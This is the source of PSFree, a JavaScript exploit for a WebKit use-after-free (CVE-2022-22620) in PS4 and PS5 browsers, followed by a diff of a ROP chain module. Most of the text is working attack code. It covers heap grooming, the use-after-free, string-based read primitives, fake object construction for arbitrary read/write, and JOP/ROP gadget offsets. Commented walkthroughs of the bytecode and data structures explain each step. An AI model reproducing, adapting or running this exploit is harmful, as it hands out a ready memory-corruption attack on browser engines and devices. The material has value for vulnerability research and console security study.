MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
// PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write
//
// vulnerable:
// * PS4 [6.00, 10.00)
// * PS5 [1.00, 6.00)
//
// * CelesteBlue from ps4-dev on discord.com
// * Helped in figuring out the size of WebCore::SerializedScriptValue and
// its needed offsets on different firmwares.
// * figured out the range of vulnerable firmwares
// * janisslsm from ps4-dev on discord.com
// * Helped in figuring out the size of JSC::ArrayBufferContents and its
// needed offsets on different firmwares.
// * Kameleon_ from ps4-dev on discord.com - tester
// * SlidyBat from PS5 R&D discord.com
// * Helped in figuring out the size of JSC::ArrayBufferContents and its
// needed offsets on different firmwares (PS5).
import { Int } from '/module/int64.mjs';
import { Memory } from '/module/mem.mjs';
import { KB, MB } from '/module/offset.mjs';
import { BufferView } from '/module/rw.mjs';
import {
die,
DieError,
log,
clear_log,
sleep,
hex,
align,
} from '/module/utils.mjs';
import * as config from '/config.mjs';
import * as off from '/module/offset.mjs';
// check if we are running on a supported firmware version
const [is_ps4, version] = (() => {
const value = config.target;
const is_ps4 = (value & 0x10000) === 0;
const version = value & 0xffff;
const [lower, upper] = (() => {
if (is_ps4) {
return [0x600, 0x1000];
} else {
return [0x100, 0x600];
}
})();
if (!(lower <= version && version < upper)) {
throw RangeError(`invalid config.target: ${hex(value)}`);
}
return [is_ps4, version];
})();
const ssv_len = (() => {
if (0x600 <= config.target && config.target < 0x650) {
return 0x58;
}
// PS4 9.xx and all supported PS5 versions
if (config.target >= 0x900) {
return 0x50;
}
if (0x650 <= config.target && config.target < 0x900) {
return 0x48;
}
})();
// these constants are expected to be divisible by 2
const num_fsets = 0x180;
const num_spaces = 0x40;
const num_adjs = 8;
const num_reuses = 0x300;
const num_strs = 0x200;
const num_leaks = 0x100;
// we can use the rows attribute of a frameset to allocate from fastMalloc
//
// see parseAttribute() from
// WebKit/Source/WebCore/html/HTMLFrameSetElement.cpp at PS4 8.0x
//
// parseAttribute() will call newLengthArray():
//
// UniqueArray<Length> newLengthArray(const String& string, int& len)
// {
// RefPtr<StringImpl> str = string.impl()->simplifyWhiteSpace();
// ...
// len = countCharacter(*str, ',') + 1; [1]
// auto r = makeUniqueArray<Length>(len); [2]
// ...
// }
//
// pseudocode definition:
//
// class UniqueArray<Length>:
// size_t _size; [3]
// Length _data[];
//
// [2] allocates from the fastMalloc heap. [1] will add an additional 1 to len.
// [3] adds an extra 8 bytes to the array
//
// a Length is 8 bytes in size. if we want to allocate ssv_len bytes from
// fastMalloc, then we need:
//
// const num_repeats = ssv_len / 8 - 2;
// const rows = ','.repeat(num_repeats);
const rows = ','.repeat(ssv_len / 8 - 2);
const original_strlen = ssv_len - off.size_strimpl;
const original_loc = location.pathname;
function gc() {
new Uint8Array(4 * MB);
}
function sread64(str, offset) {
const low = (
str.charCodeAt(offset)
| str.charCodeAt(offset + 1) << 8
| str.charCodeAt(offset + 2) << 16
| str.charCodeAt(offset + 3) << 24
);
const high = (
str.charCodeAt(offset + 4)
| str.charCodeAt(offset + 5) << 8
| str.charCodeAt(offset + 6) << 16
| str.charCodeAt(offset + 7) << 24
);
return new Int(low, high);
}
function prepare_uaf() {
const fsets = [];
const indices = [];
function alloc_fs(fsets, size) {
for (let i = 0; i < size / 2; i++) {
const fset = document.createElement('frameset');
fset.rows = rows;
fset.cols = rows;
fsets.push(fset);
}
}
// the first call to either replaceState/pushState is likely to allocate a
// JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
// the SmallLine where the SSV resides from being freed. so we do a dummy
// call first
history.replaceState('state0', '');
alloc_fs(fsets, num_fsets);
// the "state1" SSVs is what we will UAF
history.pushState('state1', '', original_loc + '#bar');
indices.push(fsets.length);
alloc_fs(fsets, num_spaces);
history.pushState('state1', '', original_loc + '#foo');
indices.push(fsets.length);
alloc_fs(fsets, num_spaces);
history.pushState('state2', '');
return [fsets, indices];
}
// WebCore::SerializedScriptValue use-after-free
//
// be careful when accessing history.state since History::state() will get
// called. History will cache the SSV at its m_lastStateObjectRequested if you
// do. that field is a RefPtr, thus preventing a UAF if we cache "state1"
async function uaf_ssv(fsets, index, index2) {
const views = [];
const input = document.createElement('input');
input.id = 'input';
const foo = document.createElement('input');
foo.id = 'foo';
const bar = document.createElement('a');
bar.id = 'bar';
log(`ssv_len: ${hex(ssv_len)}`);
let pop = null;
let pop2 = null;
let pop_promise2 = null;
let blurs = [0, 0];
let resolves = [];
function onpopstate(event) {
const no_pop = pop === null;
const idx = no_pop ? 0 : 1;
log(`pop ${idx} came`);
if (blurs[idx] === 0) {
const r = resolves[idx][1];
r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
}
if (no_pop) {
pop_promise2 = new Promise((resolve, reject) => {
resolves.push([resolve, reject]);
addEventListener('popstate', onpopstate, {once: true});
history.back();
});
}
if (no_pop) {
pop = event;
} else {
pop2 = event;
}
resolves[idx][0]();
}
const pop_promise = new Promise((resolve, reject) => {
resolves.push([resolve, reject]);
addEventListener('popstate', onpopstate, {once: true});
});
function onblur(event) {
const target = event.target;
const is_input = target === input;
const idx = is_input ? 0 : 1;
log(`${target.id} blur came`);
if (blurs[idx] > 0) {
die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
}
// we replace the URL with the original so the user can rerun the
// exploit via a reload. If we don't, the exploit will append another
// "#foo" to the URL and the input element will not be blurred because
// the foo element won't be scrolled to during history.back()
history.replaceState('state3', '', original_loc);
// free the SerializedScriptValue's neighbors and thus free the
// SmallLine where it resides
const fset_idx = is_input ? index : index2;
for (let i = fset_idx - num_adjs/2; i < fset_idx + num_adjs/2; i++) {
fsets[i].rows = '';
fsets[i].cols = '';
}
for (let i = 0; i < num_reuses; i++) {
const view = new Uint8Array(new ArrayBuffer(ssv_len));
view[0] = 0x41;
views.push(view);
}
blurs[idx]++;
}
input.addEventListener('blur', onblur);
foo.addEventListener('blur', onblur);
document.body.append(input);
document.body.append(foo);
document.body.append(bar);
// FrameLoader::loadInSameDocument() calls Document::statePopped().
// statePopped() will defer firing of popstate until we're in the complete
// state
//
// this means that onblur() will run with "state2" as the current history
// item if we call loadInSameDocument too early
log(`readyState now: ${document.readyState}`);
if (document.readyState !== 'complete') {
await new Promise(resolve => {
document.addEventListener('readystatechange', function foo() {
if (document.readyState === 'complete') {
document.removeEventListener('readystatechange', foo);
resolve();
}
});
});
}
log(`readyState now: ${document.readyState}`);
await new Promise(resolve => {
input.addEventListener('focus', resolve, {once: true});
input.focus();
});
history.back();
await pop_promise;
await pop_promise2;
log('done await popstate');
input.remove();
foo.remove();
bar.remove();
const res = [];
for (let i = 0; i < views.length; i++) {
const view = views[i];
if (view[0] !== 0x41) {
log(`view index: ${hex(i)}`);
log('found view:');
log(view);
// set SSV's refcount to 1, all other fields to 0/NULL
view[0] = 1;
view.fill(0, 1);
if (res.length) {
res[1] = [new BufferView(view.buffer), pop2];
break;
}
// return without keeping any references to pop, making it GC-able.
// its WebCore::PopStateEvent will then be freed on its death
res[0] = new BufferView(view.buffer);
i = num_reuses - 1;
}
}
if (res.length !== 2) {
die('failed SerializedScriptValue UAF');
}
return res;
}
class Reader {
constructor(rstr, rstr_view) {
this.rstr = rstr;
this.rstr_view = rstr_view;
this.m_data = rstr_view.read64(off.strimpl_m_data);
}
read8_at(offset) {
return this.rstr.charCodeAt(offset);
}
read32_at(offset) {
const str = this.rstr;
return (
str.charCodeAt(offset)
| str.charCodeAt(offset + 1) << 8
| str.charCodeAt(offset + 2) << 16
| str.charCodeAt(offset + 3) << 24
) >>> 0;
}
read64_at(offset) {
return sread64(this.rstr, offset);
}
read64(addr) {
this.rstr_view.write64(off.strimpl_m_data, addr);
return sread64(this.rstr, 0);
}
set_addr(addr) {
this.rstr_view.write64(off.strimpl_m_data, addr);
}
// remember to use this to fix up the StringImpl before freeing it
restore() {
this.rstr_view.write64(off.strimpl_m_data, this.m_data);
this.rstr_view.write32(off.strimpl_strlen, original_strlen);
}
}
// we now have a double free on the fastMalloc heap
async function make_rdr(view) {
let str_wait = 0;
const strs = [];
const u32 = new Uint32Array(1);
const u8 = new Uint8Array(u32.buffer);
const marker_offset = original_strlen - 4;
const pad = 'B'.repeat(marker_offset);
log('start string spray');
while (true) {
for (let i = 0; i < num_strs; i++) {
u32[0] = i;
// on versions like 8.0x:
// * String.fromCharCode() won't create a 8-bit string. so we use
// fromCodePoint() instead
// * Array.prototype.join() won't try to convert 16-bit strings to
// 8-bit
//
// given the restrictions above, we will ensure "str" is always a
// 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
// to see that String.prototype.repeat() will create a 8-bit string
// if the repeated string's length is 1
//
// Array.prototype.join() calls JSC::JSStringJoiner::join(). it
// returns a plain JSString (not a JSRopeString). that means we
// have allocated a WTF::StringImpl with the proper size and whose
// string data is inlined
const str = [pad, String.fromCodePoint(...u8)].join('');
strs.push(str);
}
if (view.read32(off.strimpl_inline_str) === 0x42424242) {
view.write32(off.strimpl_strlen, 0xffffffff);
break;
}
strs.length = 0;
gc();
await sleep();
str_wait++;
}
log(`JSString reused memory at loop: ${str_wait}`);
const idx = view.read32(off.strimpl_inline_str + marker_offset);
log(`str index: ${hex(idx)}`);
log('view:');
log(view);
// versions like 8.0x have a JSC::JSString that have their own m_length
// field. strings consult that field instead of the m_length of their
// StringImpl
//
// we work around this by passing the string to Error.
// ErrorInstance::create() will then create a new JSString initialized from
// the StringImpl of the message argument
const rstr = Error(strs[idx]).message;
log(`str len: ${hex(rstr.length)}`);
if (rstr.length === 0xffffffff) {
log('confirmed correct leaked');
const addr = (
view.read64(off.strimpl_m_data)
.sub(off.strimpl_inline_str)
);
log(`view's buffer address: ${addr}`);
return new Reader(rstr, view);
}
die("JSString wasn't modified");
}
// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
// of JSValues whose size is ssv_len. the undefined constant is automatically
// added due to reasons such as "undefined is returned by default if the
// function exits without returning anything"
const cons_len = ssv_len - 8*5;
const bt_offset = 0;
const idx_offset = ssv_len - 8*3;
const strs_offset = ssv_len - 8*2;
const src_part = (() => {
// we user var instead of let/const since such variables always get
// initialized to the NULL JSValue even if you immediately return. we will
// make functions that do as little as possible in order to speed up the
// exploit. m_constantRegisters will still contain the unused constants
//
// function foo() {
// return;
// let a = 1;
// }
//
// the resulting bytecode:
// bb#1
// [ 0] enter
// [ 1] get_scope loc4
// [ 3] mov loc5, loc4
// [ 6] check_traps
// // this part still initializes a with the NULL JSValue
// [ 7] mov loc6, <JSValue()>(const0)
// [ 10] ret Undefined(const1)
// Successors: [ ]
//
// bb#2
// [ 12] mov loc6, Int32: 1(const2)
// [ 15] ret Undefined(const1)
// Successors: [ ]
//
//
// Constants:
// k0 = <JSValue()>
// k1 = Undefined
// k2 = Int32: 1: in source as integer
let res = 'var f = 0x11223344;\n';
// make unique constants that won't collide with the possible marker values
for (let i = 0; i < cons_len; i += 8) {
res += `var a${i} = ${num_leaks + i};\n`;
}
return res;
})();
async function leak_code_block(reader, bt_size) {
const rdr = reader;
const bt = [];
// take into account the cell and indexing header of the immutable
// butterfly
for (let i = 0; i < bt_size - 0x10; i += 8) {
bt.push(i);
}
// cache the global variable resolution
const slen = ssv_len;
const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
const part = bt_part + src_part;
const cache = [];
for (let i = 0; i < num_leaks; i++) {
cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
}
const chunkSize = (is_ps4 && version < 0x900) ? 128 * KB : 1 * MB;
const smallPageSize = 4 * KB;
const search_addr = align(rdr.m_data, chunkSize);
log(`search addr: ${search_addr}`);
log(`func_src:\n${cache[0]}\nfunc_src end`);
log('start find CodeBlock');
let winning_off = null;
let winning_idx = null;
let winning_f = null;
let find_cb_loop = 0;
// false positives
let fp = 0;
rdr.set_addr(search_addr);
loop: while (true) {
const funcs = [];
for (let i = 0; i < num_leaks; i++) {
const f = Function(cache[i]);
// the first call allocates the CodeBlock
f();
funcs.push(f);
}
for (let p = 0; p < chunkSize; p += smallPageSize) {
for (let i = p; i < p + smallPageSize; i += slen) {
if (rdr.read32_at(i + 8) !== 0x11223344) {
continue;
}
rdr.set_addr(rdr.read64_at(i + strs_offset));
const m_type = rdr.read8_at(5);
// make sure we're not reading the constant registers of an
// UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
// CodeBlock converts those to JSArrays
if (m_type !== 0) {
rdr.set_addr(search_addr);
winning_off = i;
winning_idx = rdr.read32_at(i + idx_offset);
winning_f = funcs[winning_idx];
break loop;
}
rdr.set_addr(search_addr);
fp++;
}
}
find_cb_loop++;
gc();
await sleep();
}
log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
log('CodeBlock.m_constantRegisters.m_buffer:');
rdr.set_addr(search_addr.add(winning_off));
for (let i = 0; i < slen; i += 8) {
log(`${rdr.read64_at(i)} | ${hex(i)}`);
}
const bt_addr = rdr.read64_at(bt_offset);
const strs_addr = rdr.read64_at(strs_offset);
log(`immutable butterfly addr: ${bt_addr}`);
log(`string array passed to tag addr: ${strs_addr}`);
log('JSImmutableButterfly:');
rdr.set_addr(bt_addr);
for (let i = 0; i < bt_size; i += 8) {
log(`${rdr.read64_at(i)} | ${hex(i)}`);
}
log('string array:');
rdr.set_addr(strs_addr);
for (let i = 0; i < off.size_jsobj; i += 8) {
log(`${rdr.read64_at(i)} | ${hex(i)}`);
}
return [winning_f, bt_addr, strs_addr];
}
// data to write to the SerializedScriptValue
//
// setup to make deserialization create an ArrayBuffer with an arbitrary buffer
// address
function make_ssv_data(ssv_buf, view, view_p, addr, size) {
// sizeof JSC::ArrayBufferContents
const size_abc = (() => {
if (is_ps4) {
return version >= 0x900 ? 0x18 : 0x20;
} else {
return version >= 0x300 ? 0x18 : 0x20;
}
})();
const data_len = 9;
// sizeof WTF::Vector<T>
const size_vector = 0x10;
// SSV offsets
const off_m_data = 8;
const off_m_abc = 0x18;
// view offsets
const voff_vec_abc = 0; // Vector<ArrayBufferContents>
const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
const voff_data = voff_abc + size_abc;
// WTF::Vector<unsigned char>
// write m_data
// m_buffer
ssv_buf.write64(off_m_data, view_p.add(voff_data));
// m_capacity
ssv_buf.write32(off_m_data + 8, data_len);
// m_size
ssv_buf.write64(off_m_data + 0xc, data_len);
// 6 is the serialization format version number for ps4 6.00. The format
// is backwards compatible and using a value less than the current version
// number used by a specific WebKit version is considered valid.
//
// See CloneDeserializer::isValid() from
// WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
const CurrentVersion = 6;
const ArrayBufferTransferTag = 23;
view.write32(voff_data, CurrentVersion);
view[voff_data + 4] = ArrayBufferTransferTag;
view.write32(voff_data + 5, 0);
// std::unique_ptr<WTF::Vector<JSC::ArrayBufferContents>>
// write m_arrayBufferContentsArray
ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
// write WTF::Vector<JSC::ArrayBufferContents>
view.write64(voff_vec_abc, view_p.add(voff_abc));
view.write32(voff_vec_abc + 8, 1);
view.write32(voff_vec_abc + 0xc, 1);
if (size_abc === 0x20) {
// m_destructor, offset 0, leave as 0
// m_shared, offset 8, leave as 0
// m_data
view.write64(voff_abc + 0x10, addr);
// m_sizeInBytes
view.write32(voff_abc + 0x18, size);
} else {
// m_data
view.write64(voff_abc + 0, addr);
// m_destructor (48 bits), offset 8, leave as 0
// m_shared (48 bits), offset 0xe, leave as 0
// m_sizeInBytes
view.write32(voff_abc + 0x14, size);
}
}
async function make_arw(reader, view2, pop) {
const rdr = reader;
// we have to align the fake object to atomSize (16) else the process
// crashes. we don't know why
//
// since cells (GC memory chunks) are always aligned to atomSize, there
// might be code that's assuming that all GC pointers are aligned
//
// see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
// PS4 8.0x
const fakeobj_off = 0x20;
const fakebt_base = fakeobj_off + off.size_jsobj;
// sizeof JSC::IndexingHeader
const indexingHeader_size = 8;
// sizeof JSC::ArrayStorage
const arrayStorage_size = 0x18;
// there's only the .raw property
const propertyStorage = 8;
const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
log('STAGE: leak CodeBlock');
// has too be greater than 0x10. the size of JSImmutableButterfly
const bt_size = 0x10 + fakebt_off + arrayStorage_size;
const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
const view = rdr.rstr_view;
const view_p = rdr.m_data.sub(off.strimpl_inline_str);
const view_save = new Uint8Array(view);
view.fill(0);
make_ssv_data(view2, view, view_p, bt_addr, bt_size);
const bt = new BufferView(pop.state);
view.set(view_save);
log('ArrayBuffer pointing to JSImmutableButterfly:');
for (let i = 0; i < bt.byteLength; i += 8) {
log(`${bt.read64(i)} | ${hex(i)}`);
}
// the immutable butterfly's indexing type is ArrayWithInt32 so
// JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
// for JSObjects to recursively visit. this means that we can write
// anything to the the butterfly's data area without fear of a GC crash
const val_true = 7; // JSValue of "true"
const strs_cell = rdr.read64(strs_addr);
bt.write64(fakeobj_off, strs_cell);
bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
// since .raw is the first ever created property, it's just besides the
// indexing header
bt.write64(fakebt_off - 0x10, val_true);
// indexing header's publicLength and vectorLength
bt.write32(fakebt_off - 8, 1);
bt.write32(fakebt_off - 8 + 4, 1);
// custom ArrayStorage that allows read/write to index 0. we have to use an
// ArrayStorage because the structure assigned to the structure ID expects
// one so visitButterfly() will crash if we try to fake the object with a
// regular butterfly
// m_sparseMap
bt.write64(fakebt_off, 0);
// m_indexBias
bt.write32(fakebt_off + 8, 0);
// m_numValuesInVector
bt.write32(fakebt_off + 0xc, 1);
// m_vector[0]
bt.write64(fakebt_off + 0x10, val_true);
// immutable_butterfly[0] = fakeobj;
bt.write64(0x10, bt_addr.add(fakeobj_off));
const fake = func()[0];
log(`fake.raw: ${fake.raw}`);
log(`fake[0]: ${fake[0]}`);
log(`fake: [${fake}]`);
const test_val = 3;
log(`test setting fake[0] to ${test_val}`);
fake[0] = test_val;
if (fake[0] !== test_val) {
die(`unexpected fake[0]: ${fake[0]}`);
}
function addrof(obj) {
fake[0] = obj;
return bt.read64(fakebt_off + 0x10);
}
// m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
// unlike FastTypedArray, where the buffer is managed by the GC. This
// prevents random crashes.
//
// See JSGenericTypedArrayView<Adaptor>::visitChildren() from
// WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
// PS4 8.0x.
const worker = new DataView(new ArrayBuffer(1));
const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
const leaker = {addr: null, 0: 0};
const worker_p = addrof(worker);
const main_p = addrof(main_template);
const leaker_p = addrof(leaker);
// we'll fake objects using a JSArrayBufferView whose m_mode is
// FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
// current fastSizeLimit is 1000. if the length is less than or equal to
// that, we get a FastTypedArray
const scaled_sview = off.size_view / 4;
const faker = new Uint32Array(scaled_sview);
const faker_p = addrof(faker);
const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
const vector_idx = off.view_m_vector / 4;
const length_idx = off.view_m_length / 4;
const mode_idx = off.view_m_mode / 4;
const bt_idx = off.js_butterfly / 4;
// fake a Uint32Array using GC memory
faker[vector_idx] = worker_p.lo;
faker[vector_idx + 1] = worker_p.hi;
faker[length_idx] = scaled_sview;
rdr.set_addr(main_p);
faker[mode_idx] = rdr.read32_at(off.view_m_mode);
// JSCell
faker[0] = rdr.read32_at(0);
faker[1] = rdr.read32_at(4);
faker[bt_idx] = rdr.read32_at(off.js_butterfly);
faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
// fakeobj()
bt.write64(fakebt_off + 0x10, faker_vector);
const main = fake[0];
log('main (pointing to worker):');
for (let i = 0; i < off.size_view; i += 8) {
const idx = i / 4;
log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
}
new Memory(
main, worker, leaker,
leaker_p.add(off.js_inline_prop),
rdr.read64(leaker_p.add(off.js_butterfly)),
);
log('achieved arbitrary r/w');
rdr.restore();
// set the refcount to a high value so we don't free the memory, view's
// death will already free it (a StringImpl is currently using the memory)
view.write32(0, -1);
// ditto (a SerializedScriptValue is currently using the memory)
view2.write32(0, -1);
// we don't want its death to call fastFree() on GC memory
make_arw._buffer = bt.buffer;
}
async function main() {
log('STAGE: UAF SSV');
const [fsets, indices] = prepare_uaf();
const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
log('STAGE: get string relative read primitive');
const rdr = await make_rdr(view);
for (const fset of fsets) {
fset.rows = '';
fset.cols = '';
}
log('STAGE: achieve arbitrary read/write primitive');
await make_arw(rdr, view2, pop);
clear_log();
// path to your script that will use the exploit
import('./scripts/lapse.mjs');
//import('./rop/900_working.mjs');
}
main();
rop/800.mjs
+112 -1141
View File
File diff suppressed because it is too large Load Diff
rop/900.mjs
+152 -124
View File
@@ -17,13 +17,13 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// by janisslsm (John) from ps4-dev discord // by janisslsm (John) from ps4-dev discord
import * as config from '../config.mjs'; import * as config from '/config.mjs';
import { Int } from '../module/int64.mjs'; import { Int } from '/module/int64.mjs';
import { debug_log, die } from '../module/utils.mjs'; import { log, align, die } from '/module/utils.mjs';
import { Addr, mem } from '../module/mem.mjs'; import { Addr, mem } from '/module/mem.mjs';
import { KB, MB } from '../module/constants.mjs'; import { KB, MB } from '/module/constants.mjs';
import { ChainBase } from '../module/chain.mjs'; import { ChainBase } from '/module/chain.mjs';
import { import {
make_buffer, make_buffer,
@@ -31,10 +31,10 @@ import {
get_view_vector, get_view_vector,
resolve_import, resolve_import,
init_syscall_array, init_syscall_array,
} from '../module/memtools.mjs'; } from '/module/memtools.mjs';
import * as rw from '../module/rw.mjs'; import * as rw from '/module/rw.mjs';
import * as o from '../module/offset.mjs'; import * as o from '/module/offset.mjs';
const origin = window.origin; const origin = window.origin;
const port = '8000'; const port = '8000';
@@ -42,7 +42,9 @@ const url = `${origin}:${port}`;
const syscall_array = []; const syscall_array = [];
const offset_func_exec = 0x18;
const offset_textarea_impl = 0x18; const offset_textarea_impl = 0x18;
const offset_js_inline_prop = 0x10;
// WebKit offsets of imported functions // WebKit offsets of imported functions
const offset_wk_stack_chk_fail = 0x178; const offset_wk_stack_chk_fail = 0x178;
@@ -66,55 +68,64 @@ let setjmp_addr = null;
let longjmp_addr = null; let longjmp_addr = null;
// libSceNKWebKit.sprx // libSceNKWebKit.sprx
let libwebkit_base = null; export let libwebkit_base = null;
// libkernel_web.sprx // libkernel_web.sprx
let libkernel_base = null; export let libkernel_base = null;
// libSceLibcInternal.sprx // libSceLibcInternal.sprx
let libc_base = null; export let libc_base = null;
// Chain implementation based on Chain800. Replaced offsets that changed // Chain implementation based on Chain803. Replaced offsets that changed
// between versions. Replaced gadgets that were missing with new ones that // between versions. Replaced gadgets that were missing with new ones that
// won't change the API. // won't change the API.
//
// gadgets for the JOP chain // gadgets for the JOP chain
// //
// Why these JOP chain gadgets are not named jop1-3 and jop2-5 not jop4-7 is
// because jop1-5 was the original chain used by the old implementation of
// Chain803. Now the sequence is ta_jop1-3 then to jop2-5.
//
// When the scrollLeft getter native function is called on PS4 9.00, rsi is the // When the scrollLeft getter native function is called on PS4 9.00, rsi is the
// JS wrapper for the WebCore textarea class. // JS wrapper for the WebCore textarea class.
const jop1 = ` const ta_jop1 = `
mov rdi, qword ptr [rsi + 0x20] mov rdi, qword ptr [rsi + 0x18]
mov rax, qword ptr [rdi] mov rax, qword ptr [rdi]
call qword ptr [rax + 0x28] call qword ptr [rax + 0xb8]
`; `;
// Since the method of code redirection we used is via redirecting a call to // Since the method of code redirection we used is via redirecting a call to
// jump to our JOP chain, we have the return address of the caller on entry. // jump to our JOP chain, we have the return address of the caller on entry.
// //
// jop1 pushed another object (via the call instruction) but we want no extra // ta_jop1 pushed another object (via the call instruction) but we want no
// objects between the return address and the rbp that will be pushed by jop3 // extra objects between the return address and the rbp that will be pushed by
// later. So we pop the return address pushed by jop1. // jop2 later. So we pop the return address pushed by ta_jop1.
// //
// This will make pivoting back easy, just "leave; ret". // This will make pivoting back easy, just "leave; ret".
const jop2 = ` const ta_jop2 = `
pop rcx pop rsi
jmp qword ptr [rax + 0x7d] jmp qword ptr [rax + 0x1c]
`;
const ta_jop3 = `
mov rdi, qword ptr [rax + 8]
mov rax, qword ptr [rdi]
jmp qword ptr [rax + 0x30]
`; `;
// rbp is now pushed, any extra objects pushed by the call instructions can be // rbp is now pushed, any extra objects pushed by the call instructions can be
// ignored // ignored
const jop3 = ` const jop2 = `
push rbp push rbp
mov rbp, rsp mov rbp, rsp
mov rax, qword ptr [rdi] mov rax, qword ptr [rdi]
call qword ptr [rax + 0x58] call qword ptr [rax + 0x58]
`; `;
const jop4 = ` const jop3 = `
mov rdx, qword ptr [rax + 0x18] mov rdx, qword ptr [rax + 0x18]
mov rax, qword ptr [rdi] mov rax, qword ptr [rdi]
call qword ptr [rax + 0x10] call qword ptr [rax + 0x10]
`; `;
const jop5 = ` const jop4 = `
push rdx push rdx
jmp qword ptr [rax] jmp qword ptr [rax]
`; `;
const jop6 = 'pop rsp; ret'; const jop5 = 'pop rsp; ret';
// the ps4 firmware is compiled to use rbp as a frame pointer // the ps4 firmware is compiled to use rbp as a frame pointer
// //
@@ -130,11 +141,6 @@ const jop6 = 'pop rsp; ret';
// pop rbp // pop rbp
const rop_epilogue = 'leave; ret'; const rop_epilogue = 'leave; ret';
const push_rdx_jmp = `
push rdx
jmp qword ptr [rax]
`;
const webkit_gadget_offsets = new Map(Object.entries({ const webkit_gadget_offsets = new Map(Object.entries({
'pop rax; ret' : 0x0000000000051a12, 'pop rax; ret' : 0x0000000000051a12,
'pop rbx; ret' : 0x00000000000be5d0, 'pop rbx; ret' : 0x00000000000be5d0,
@@ -162,22 +168,27 @@ const webkit_gadget_offsets = new Map(Object.entries({
'neg rax; and rax, rcx; ret' : 0x00000000019771c4, 'neg rax; and rax, rcx; ret' : 0x00000000019771c4,
'adc esi, esi; ret' : 0x000000000148874e, 'adc esi, esi; ret' : 0x000000000148874e,
'add rax, rdx; ret' : 0x00000000003f662c, 'add rax, rdx; ret' : 0x00000000003f662c,
'push rsp; jmp qword ptr [rax]' : 0x0000000002bae87f,
'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 0x0000000001b1ed66, 'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 0x0000000001b1ed66,
'pop rsi; jmp qword ptr [rax + 0x1c]' : 0x00000000021fce7e, 'pop rsi; jmp qword ptr [rax + 0x1c]' : 0x00000000021fce7e,
'mov qword ptr [rdi], rsi; ret' : 0x0000000000040300, 'mov qword ptr [rdi], rsi; ret' : 0x0000000000040300,
'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, 'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc,
'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, 'mov qword ptr [rdi], rax; ret' : 0x000000000000613b,
'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
'mov rdx, rcx; ret' : 0x000000000157fe71, 'mov rdx, rcx; ret' : 0x000000000157fe71,
[push_rdx_jmp] : 0x00000000028bd332, 'mov dword ptr [rax], esi; ret' : 0x00000000005c3482,
'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
[jop1] : 0x0000000000f2c778, [jop2] : 0x0000000000683800,
[jop2] : 0x0000000002c326c2, [jop3] : 0x0000000000303906,
[jop3] : 0x0000000000683800, [jop4] : 0x00000000028bd332,
[jop4] : 0x0000000000303906, [jop5] : 0x000000000004e293,
[jop5] : 0x00000000028bd332,
[jop6] : 0x000000000004e293, [ta_jop1] : 0x00000000004e62a4,
[ta_jop2] : 0x00000000021fce7e,
[ta_jop3] : 0x00000000019becb4,
})); }));
const libc_gadget_offsets = new Map(Object.entries({ const libc_gadget_offsets = new Map(Object.entries({
@@ -186,9 +197,16 @@ const libc_gadget_offsets = new Map(Object.entries({
'mov qword ptr [rsi], rcx; ret' : 0x00000000000cf982, 'mov qword ptr [rsi], rcx; ret' : 0x00000000000cf982,
'setjmp' : offset_libc_setjmp, 'setjmp' : offset_libc_setjmp,
'longjmp' : offset_libc_longjmp, 'longjmp' : offset_libc_longjmp,
//'getcontext' : 0x258f4,
'setcontext' : 0x638,
})); }));
const gadgets = new Map(); const libkernel_gadget_offsets = new Map(Object.entries({
// returns the location of errno
'__error' : 0xCB80,
}));
export const gadgets = new Map();
function get_bases() { function get_bases() {
const textarea = document.createElement('textarea'); const textarea = document.createElement('textarea');
@@ -200,11 +218,15 @@ function get_bases() {
libwebkit_base libwebkit_base
.add(offset_wk_stack_chk_fail) .add(offset_wk_stack_chk_fail)
; ;
const stack_chk_fail_addr = resolve_import(stack_chk_fail_import); const stack_chk_fail_addr = resolve_import(
stack_chk_fail_import,
true,
true
);
const libkernel_base = find_base(stack_chk_fail_addr, true, true); const libkernel_base = find_base(stack_chk_fail_addr, true, true);
const memcpy_import = libwebkit_base.add(offset_wk_memcpy); const memcpy_import = libwebkit_base.add(offset_wk_memcpy);
const memcpy_addr = resolve_import(memcpy_import); const memcpy_addr = resolve_import(memcpy_import, true, true);
const libc_base = find_base(memcpy_addr, true, true); const libc_base = find_base(memcpy_addr, true, true);
return [ return [
@@ -214,7 +236,7 @@ function get_bases() {
]; ];
} }
